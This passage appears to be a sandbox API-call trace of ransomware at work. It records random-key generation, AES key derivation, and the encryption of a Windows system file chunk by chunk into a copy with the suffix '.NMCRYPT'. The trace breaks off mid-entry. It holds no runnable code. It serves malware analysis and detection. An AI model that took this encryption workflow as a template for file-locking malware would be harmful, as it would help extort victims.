[0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.425] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0168.425] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0168.426] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0168.426] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.426] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad838) returned 1 [0168.426] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0168.426] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0168.426] wcslen (_String="\\\\?\\") returned 0x4 [0168.426] CryptDuplicateKey (in: hKey=0x9ad838, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad7f8) returned 1 [0168.426] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0168.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0168.502] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=10752) returned 1 [0168.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0168.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.504] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.504] GetLastError () returned 0x0 [0168.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.725] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.726] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.726] GetLastError () returned 0x0 [0168.726] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.726] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.726] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.727] GetLastError () returned 0x0 [0168.727] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.727] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.727] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.727] GetLastError () returned 0x0 [0168.727] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.727] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.727] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.727] GetLastError () returned 0x0 [0168.727] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.727] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.727] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.727] GetLastError () returned 0x0 [0168.727] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.728] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.728] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.728] GetLastError () returned 0x0 [0168.728] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.728] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.728] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.728] GetLastError () returned 0x0 [0168.728] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.728] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.728] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.728] GetLastError () returned 0x0 [0168.728] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.728] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.728] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.728] GetLastError () returned 0x0 [0168.728] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.729] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.729] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.729] GetLastError () returned 0x0 [0168.729] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.729] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.729] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.729] GetLastError () returned 0x0 [0168.729] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.729] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.729] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.729] GetLastError () returned 0x0 [0168.729] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.729] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.729] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.729] GetLastError () returned 0x0 [0168.729] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.730] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.730] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.730] GetLastError () returned 0x0 [0168.730] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.730] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.730] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.730] GetLastError () returned 0x0 [0168.730] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.730] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.730] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.730] GetLastError () returned 0x0 [0168.730] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.730] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.731] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.731] GetLastError () returned 0x0 [0168.731] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.731] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.731] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.731] GetLastError () returned 0x0 [0168.731] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.731] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.731] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.731] GetLastError () returned 0x0 [0168.731] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.731] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.731] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.731] GetLastError () returned 0x0 [0168.731] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.732] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.732] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.732] GetLastError () returned 0x0 [0168.732] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.732] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.732] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.732] GetLastError () returned 0x0 [0168.732] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.732] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.732] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.732] GetLastError () returned 0x0 [0168.732] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.732] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.732] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.732] GetLastError () returned 0x0 [0168.732] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.733] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.733] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.733] GetLastError () returned 0x0 [0168.733] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.733] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.733] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.733] GetLastError () returned 0x0 [0168.733] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.733] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: 